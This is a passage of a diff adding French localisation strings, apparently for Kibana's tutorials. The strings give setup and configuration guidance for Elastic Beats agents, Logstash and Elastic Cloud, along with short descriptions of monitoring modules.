À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.auditbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.auditbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.debTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.osxTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.rpmTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.rpmTextPre": "Vous utilisez Auditbeat pour la première fois ? 
Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.auditbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous {propertyName} dans le fichier {auditbeatPath} afin de pointer vers votre installation Elasticsearch.", + "home.tutorials.common.auditbeatInstructions.install.windowsTextPre": "Vous utilisez Auditbeat pour la première fois ? Consultez le [guide de démarrage rapide]({guideLinkUrl}).\n 1. Téléchargez le fichier .zip Auditbeat pour Windows via la page [Télécharger]({auditbeatLinkUrl}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Auditbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Auditbeat en tant que service Windows.", + "home.tutorials.common.filebeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.filebeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.filebeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.filebeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.filebeatEnableInstructions.debTextPost": "Modifiez les paramètres dans le fichier ''/etc/filebeat/modules.d/{moduleName}.yml''.", + "home.tutorials.common.filebeatEnableInstructions.debTitle": "Activer et configurer le module {moduleName}", + 
"home.tutorials.common.filebeatEnableInstructions.osxTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", + "home.tutorials.common.filebeatEnableInstructions.osxTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.filebeatEnableInstructions.rpmTextPost": "Modifiez les paramètres dans le fichier ''/etc/filebeat/modules.d/{moduleName}.yml''.", + "home.tutorials.common.filebeatEnableInstructions.rpmTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.filebeatEnableInstructions.windowsTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", + "home.tutorials.common.filebeatEnableInstructions.windowsTextPre": "Dans le dossier {path}, exécutez la commande suivante :", + "home.tutorials.common.filebeatEnableInstructions.windowsTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.filebeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. 
Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. 
À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.filebeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.debTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.osxTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.rpmTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.rpmTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({linkUrl}).", + "home.tutorials.common.filebeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous {propertyName} dans le fichier {filebeatPath} afin de pointer vers votre installation Elasticsearch.", + "home.tutorials.common.filebeatInstructions.install.windowsTextPre": "Vous utilisez Filebeat pour la première fois ? Consultez le [guide de démarrage rapide]({guideLinkUrl}).\n 1. Téléchargez le fichier .zip Filebeat pour Windows via la page [Télécharger]({filebeatLinkUrl}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Filebeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. 
Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Filebeat en tant que service Windows.", + "home.tutorials.common.filebeatStatusCheck.text": "Vérifier que des données sont reçues du module Filebeat \"{moduleName}\"", + "home.tutorials.common.functionbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.functionbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.functionbeatEnableOnPremInstructionsWindows.textPre": "Modifiez les paramètres dans le fichier {path}.", + "home.tutorials.common.functionbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.functionbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.functionbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. 
Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.functionbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.functionbeatInstructions.install.linuxTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.functionbeatInstructions.install.osxTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.functionbeatInstructions.install.windowsTextPre": "Vous utilisez Functionbeat pour la première fois ? Consultez le [guide de démarrage rapide]({functionbeatLink}).\n 1. Téléchargez le fichier .zip Functionbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Functionbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. 
Depuis l'invite PowerShell, accédez au répertoire Functionbeat :", + "home.tutorials.common.heartbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.heartbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.heartbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.heartbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.heartbeatEnableCloudInstructions.defaultTextPost": "Pour plus d’informations sur comment configurer des moniteurs dans Heartbeat, consultez les [documents de configuration de Heartbeat.]({configureLink})", + "home.tutorials.common.heartbeatEnableOnPremInstructions.defaultTextPost": "Où {hostTemplate} est l’URL monitorée. Pour plus d’informations sur comment configurer des moniteurs dans Heartbeat, consultez les [documents de configuration de Heartbeat.]({configureLink})", + "home.tutorials.common.heartbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", + "home.tutorials.common.heartbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.heartbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.heartbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.heartbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", + "home.tutorials.common.heartbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.heartbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.heartbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.heartbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({link}).", + "home.tutorials.common.heartbeatInstructions.install.debTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.heartbeatInstructions.install.osxTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.heartbeatInstructions.install.rpmTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.heartbeatInstructions.install.windowsTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({heartbeatLink}).\n 1. Téléchargez le fichier .zip Heartbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. 
Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Heartbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Heartbeat en tant que service Windows.", + "home.tutorials.common.logstashInstructions.install.java.osxTextPre": "Suivez les instructions d'installation [ici]({link}).", + "home.tutorials.common.logstashInstructions.install.java.windowsTextPre": "Suivez les instructions d'installation [ici]({link}).", + "home.tutorials.common.logstashInstructions.install.logstash.osxTextPre": "Vous utilisez Logstash pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.logstashInstructions.install.logstash.windowsTextPre": "Vous utilisez Logstash pour la première fois ? Consultez le [guide de démarrage rapide]({logstashLink}).\n 1. [Téléchargez]({elasticLink}) le fichier .zip Logstash pour Windows.\n 2. 
Extrayez le contenu du fichier compressé.", + "home.tutorials.common.metricbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.metricbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.metricbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.metricbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.metricbeatEnableInstructions.debTextPost": "Modifiez les paramètres dans le fichier ''/etc/metricbeat/modules.d/{moduleName}.yml''.", + "home.tutorials.common.metricbeatEnableInstructions.debTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.metricbeatEnableInstructions.osxTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", + "home.tutorials.common.metricbeatEnableInstructions.osxTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.metricbeatEnableInstructions.rpmTextPost": "Modifiez les paramètres dans le fichier ''/etc/metricbeat/modules.d/{moduleName}.yml''.", + "home.tutorials.common.metricbeatEnableInstructions.rpmTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.metricbeatEnableInstructions.windowsTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", + "home.tutorials.common.metricbeatEnableInstructions.windowsTextPre": "Dans le dossier {path}, exécutez la commande suivante :", + "home.tutorials.common.metricbeatEnableInstructions.windowsTitle": "Activer et configurer le module {moduleName}", + "home.tutorials.common.metricbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe 
de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.metricbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.metricbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. 
Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.metricbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.metricbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({link}).", + "home.tutorials.common.metricbeatInstructions.install.debTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.metricbeatInstructions.install.osxTextPre": "Vous utilisez Metricbeat pour la première fois ? 
Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.metricbeatInstructions.install.rpmTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", + "home.tutorials.common.metricbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous \"output.elasticsearch\" dans le fichier {path} afin de pointer vers votre installation Elasticsearch.", + "home.tutorials.common.metricbeatInstructions.install.windowsTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({metricbeatLink}).\n 1. Téléchargez le fichier .zip Metricbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Metricbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Metricbeat en tant que service Windows.", + "home.tutorials.common.metricbeatStatusCheck.text": "Vérifier que des données sont reçues du module Metricbeat \"{moduleName}\"", + "home.tutorials.common.premCloudInstructions.option1.textPre": "Rendez-vous sur [Elastic Cloud]({link}). Enregistrez-vous si vous n'avez pas encore de compte. Un essai gratuit de 14 jours est disponible.\n\nConnectez-vous à la console Elastic Cloud.\n\nPour créer un cluster, dans la console Elastic Cloud :\n 1. Sélectionnez **Créer un déploiement** et spécifiez le **Nom du déploiement**.\n 2. Modifiez les autres options de déploiement selon les besoins (sinon, les valeurs par défaut sont très bien pour commencer).\n 3. Cliquer sur **Créer un déploiement**\n 4. Attendre la fin de la création du déploiement\n 5. 
Accéder à la nouvelle instance cloud Kibana et suivre les instructions de la page d'accueil de Kibana", + "home.tutorials.common.premCloudInstructions.option2.textPre": "Si vous exécutez cette instance Kibana sur une instance Elasticsearch hébergée, passez à la configuration manuelle.\n\nEnregistrez le point de terminaison **Elasticsearch** en tant que {urlTemplate} et le cluster **Mot de passe** en tant que {passwordTemplate} pour les conserver.", + "home.tutorials.common.winlogbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", + "home.tutorials.common.winlogbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.winlogbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.winlogbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous \"output.elasticsearch\" dans le fichier {path} afin de pointer vers votre installation Elasticsearch.", + "home.tutorials.common.winlogbeatInstructions.install.windowsTextPre": "Vous utilisez Winlogbeat pour la première fois ? Consultez le [guide de démarrage rapide]({winlogbeatLink}).\n 1. Téléchargez le fichier .zip Winlogbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. 
Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Winlogbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Winlogbeat en tant que service Windows.", + "home.tutorials.consulMetrics.longDescription": "Le module Metricbeat \"consul\" récupère des indicateurs depuis Consul. [En savoir plus]({learnMoreLink}).", + "home.tutorials.corednsLogs.longDescription": "Il s'agit d'un module Filebeat pour CoreDNS. Celui-ci prend en charge les déploiements CoreDNS autonomes et les déploiements CoreDNS dans Kubernetes. [En savoir plus]({learnMoreLink}).", + "home.tutorials.corednsMetrics.longDescription": "Le module Metricbeat \"coredns\" récupère des indicateurs depuis CoreDNS. [En savoir plus]({learnMoreLink}).", + "home.tutorials.couchbaseMetrics.longDescription": "Le module Metricbeat \"couchbase\" récupère des indicateurs depuis Couchbase. [En savoir plus]({learnMoreLink}).", + "home.tutorials.couchdbMetrics.longDescription": "Le module Metricbeat \"couchdb\" récupère des indicateurs depuis CouchDB. [En savoir plus]({learnMoreLink}).", + "home.tutorials.crowdstrikeLogs.longDescription": "Il s'agit du module Filebeat pour CrowdStrike Falcon utilisant le [connecteur SIEM](https://www.crowdstrike.com/blog/tech-center/integrate-with-your-siem) Falcon. Ce module collecte ces données, les convertit en ECS et les ingère pour les afficher dans le SIEM. Par défaut, le connecteur SIEM Falcon génère les données d'événement de l'API de streaming Falcon au format JSON. [En savoir plus]({learnMoreLink}).", + "home.tutorials.cylanceLogs.longDescription": "Ce module permet de recevoir des logs CylancePROTECT par le biais de Syslog ou d'un fichier. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.dockerMetrics.longDescription": "Le module Metricbeat \"docker\" récupère des indicateurs depuis le serveur Docker. [En savoir plus]({learnMoreLink}).", + "home.tutorials.dropwizardMetrics.longDescription": "Le module Metricbeat \"dropwizard\" récupère des indicateurs depuis l'application Java Dropwizard. [En savoir plus]({learnMoreLink}).", + "home.tutorials.elasticsearchLogs.longDescription": "Le module Filebeat \"elasticsearch\" analyse les logs créés par Elasticsearch. [En savoir plus]({learnMoreLink}).", + "home.tutorials.elasticsearchMetrics.longDescription": "Le module Metricbeat \"elasticsearch\" récupère des indicateurs depuis Elasticsearch. [En savoir plus]({learnMoreLink}).", + "home.tutorials.envoyproxyLogs.longDescription": "Il s'agit d'un module Filebeat pour le log d'accès à Envoy Proxy (https://www.envoyproxy.io/docs/envoy/v1.10.0/configuration/access_log). Celui-ci prend en charge les déploiements autonomes et les déploiements Envoy Proxy dans Kubernetes. [Learn more]({learnMoreLink}).", + "home.tutorials.envoyproxyMetrics.longDescription": "Le module Metricbeat \"envoyproxy\" récupère des indicateurs depuis Envoy Proxy. [En savoir plus]({learnMoreLink}).", + "home.tutorials.etcdMetrics.longDescription": "Le module Metricbeat \"etcd\" récupère des indicateurs depuis Etcd. [En savoir plus]({learnMoreLink}).", + "home.tutorials.f5Logs.longDescription": "Ce module permet de recevoir des logs Big-IP Access Policy Manager par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.fortinetLogs.longDescription": "Il s'agit d'un module pour les logs Fortinet FortiOS envoyés au format Syslog. [En savoir plus]({learnMoreLink}).", + "home.tutorials.gcpLogs.longDescription": "Il s'agit d'un module pour les logs Google Cloud. 
